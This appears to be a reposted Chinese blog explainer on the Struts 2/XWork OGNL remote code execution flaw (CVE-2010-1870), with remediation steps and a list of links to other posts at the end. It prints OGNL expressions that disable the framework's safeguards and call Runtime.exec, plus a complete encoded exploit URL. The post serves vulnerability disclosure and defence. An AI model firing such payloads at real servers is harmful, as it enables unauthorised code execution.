Struts 2命令执行漏洞
来源:互联网 发布:曹县大集淘宝村现状 编辑:程序博客网 时间:2024/06/05 09:00
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。
这个漏洞的细节描述公布在exploit-db 上。
在这里简单摘述如下:
XWork通过getters/setters方法从HTTP的参数中获取对应action的名称,这个过程是基于OGNL(Object Graph Navigation Language)的。OGNL是怎么处理的呢?如下:
user.address.city=Bishkek&user['favoriteDrink']=kumys
会被转化成:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这个过程是由ParametersInterceptor调用ValueStack.setValue()完成的,它的参数是用户可控的,由HTTP参数传入。OGNL的功能较为强大,远程执行代码也正是利用了它的功能。
- * Method calling: foo()
- * Static method calling: @java.lang.System@exit(1)
- * Constructor calling: new MyClass()
- * Ability to work with context variables: #foo = new MyClass()
- * And more...
由于参数完全是用户可控的,所以XWork出于安全的目的,增加了两个方法用以阻止代码执行。
- * OgnlContext's property 'xwork.MethodAccessor.denyMethodExecution' (缺省为true)
- * SecurityMemberAccess private field called 'allowStaticMethodAccess' (缺省为false)
但这两个方法可以被覆盖,从而导致代码执行。
- #_memberAccess['allowStaticMethodAccess'] = true
- #foo = new java .lang.Boolean("false")
- #context['xwork.MethodAccessor.denyMethodExecution'] = #foo
- #rt = @java.lang.Runtime@getRuntime()
- #rt.exec('mkdir /tmp/PWNED')
ParametersInterceptor是不允许参数名称中有#的,因为OGNL中的许多预定义变量也是以#表示的。
- * #context - OgnlContext, the one guarding method execution based on 'xwork.MethodAccessor. denyMethodExecution' property value.
- * #_memberAccess - SecurityMemberAccess, whose 'allowStaticAccess' field prevented static method execution.
- * #root
- * #this
- * #_typeResolver
- * #_classResolver
- * #_traceEvaluations
- * #_lastEvaluation
- * #_keepLastEvaluation
可是攻击者在过去找到了这样的方法(bug编号XW-641):使用\u0023来代替#,这是#的十六进制编码,从而构造出可以远程执行的攻击payload。
- http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.den
- yMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRunti
- me()))=1
最终导致代码执行成功。
Struts2漏洞修复方案:
1.下载最新的版本2.3.4:http://struts.apache.org/download.cgi#struts234
2.或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。
3.可使用安恒信息扫描器检测漏洞,运用安恒信息waf防护漏洞,安全点就只保留字母数字,其它的全部删除即可。
- Struts 2命令执行漏洞
- Struts 2命令执行漏洞
- PPLIVE源代码泄露及两个struts命令执行漏洞
- Struts S2-016 远程任意命令执行漏洞检测代码
- Apache Struts远程命令执行漏洞、开放式式重定向漏洞
- Struts2命令执行漏洞--(升级struts至struts-2.3.28.1版本)
- OS命令执行漏洞
- Struct2命令执行漏洞
- 命令执行漏洞
- 命令执行漏洞总结
- ImageMagick 命令执行漏洞
- Struts 2 远程代码执行漏洞(CVE-2016-0785)解决方案
- Struts 2 远程代码执行漏洞加固方法
- sap netweaver命令执行漏洞
- 任意命令执行漏洞浅析
- Struts2远程命令执行漏洞
- 关于struts 2为什么会有代码执行漏洞的小帖子
- Struts 2最新0day破坏性漏洞(远程任意代码执行)等的重现方法
- 黑马程序员之ASP.NET学习笔记: 分享Asp.net中具体的日期格式化用法
- 让editplus支持sql格式高亮
- 人人网SDK Demo项目学习 异步发送信息
- EJB3.0笔记-1 Entity回调和监听器
- 《3》 Linux常用命令的使用
- Struts 2命令执行漏洞
- 很棒的讲解字符串的文章
- 很棒的讲解列表和元组的笔记
- 分享一些国外推广的站点
- 安装cocos2d文档集
- 青春
- 黑马程序员之C#学习笔记: C#中Tostring参数机用法详解
- 史上最详细的WIN7下WIFI共享上网教程来了!milestone有福了
- 很棒的介绍python基础知识的文章